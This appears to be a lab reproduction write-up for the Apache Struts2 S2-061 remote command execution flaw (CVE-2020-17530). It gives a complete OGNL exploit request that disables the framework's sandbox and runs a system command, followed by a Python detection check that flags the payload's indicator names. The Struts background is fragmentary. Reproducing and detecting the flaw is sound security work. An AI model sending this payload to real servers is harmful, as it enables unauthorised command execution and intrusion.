[727] 2020-12-11_Struts2 S2-061 Remote Command Execution Vulnerability Reproduction (CVE-2020-17530)

Document creator: s7ckTeam
Last updated: 2025-01-16
Struts2 S2-061 (CVE-2020-17530)
bgbing 2020-12-11

Struts 2 background (text lost in extraction; surviving terms): Struts2, MVC, Web, servlet, Controller, Struts 1, WebWork, Servlet API.

Environment: use vulhub, https://github.com/vulhub/vulhub/tree/master/struts2/s2-061 (docker-compose.yml). Start it with docker-compose up -d, then visit ip:8080 (S2-061).

Reproduction: use the exp, sent as a POST from Burp, to run id.

    POST /index.action HTTP/1.1
    Host: localhost:8080
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
    Connection: close
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
    Content-Length: 829

    ------WebKitFormBoundaryl7d1B1aGsV2wcZwF
    Content-Disposition: form-data; name="id"

    %{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("id")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
    ------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
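A detection check for the request above, as an added example that is not part of the original post: it finds OGNL expressions in a request body and escalates when they contain the class and property names seen in this payload. The function names, verdict labels and sample bodies are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Names copied from the request on this page; the notes are this example's own.
INDICATORS = {
    "org.apache.tomcat.InstanceManager": "instantiates arbitrary classes",
    "org.apache.commons.collections.BeanMap": "reaches properties via reflection",
    "memberAccess": "handle to the OGNL sandbox",
    "excludedClasses": "sandbox class blacklist",
    "excludedPackageNames": "sandbox package blacklist",
    "freemarker.template.utility.Execute": "runs an OS command",
}
OGNL_OPEN = re.compile(r"[%$]\{")

def extract_expressions(text):
    """Return each brace-balanced %{...} or ${...} span in text."""
    found = []
    for m in OGNL_OPEN.finditer(text):
        depth = 0
        for i in range(m.end() - 1, len(text)):
            depth += {"{": 1, "}": -1}.get(text[i], 0)
            if depth == 0:
                found.append(text[m.start():i + 1])
                break
    return found

def inspect_body(raw):
    """Classify one request body as clean, suspicious or block."""
    text = unquote_plus(raw)  # form posts may arrive URL-encoded
    exprs = extract_expressions(text)
    hits = []
    for expr in exprs:
        compact = re.sub(r"\s+", "", expr)  # ignore whitespace padding
        hits += [k for k in INDICATORS if k in compact and k not in hits]
    if hits:
        return "block", hits
    return ("suspicious", []) if exprs else ("clean", [])

# Constructed samples. ATTACK is an abbreviated, non-working fragment.
BENIGN = "name=alice&comment=price+is+%2410"
PROBE = "id=%25%7B1%2B1%7D"
ATTACK = ('------X\r\nContent-Disposition: form-data; name="id"\r\n\r\n'
          '%{(#im=#application["org.apache.tomcat.InstanceManager"])'
          '.(#bean.put("excludedClasses",#emptyset))}\r\n------X--')

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("probe", PROBE), ("attack", ATTACK)):
        print(label, inspect_body(body))
```

Matching on names alone is brittle, so the `suspicious` verdict for any `%{...}` arriving in a parameter is the more durable signal to alert on.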
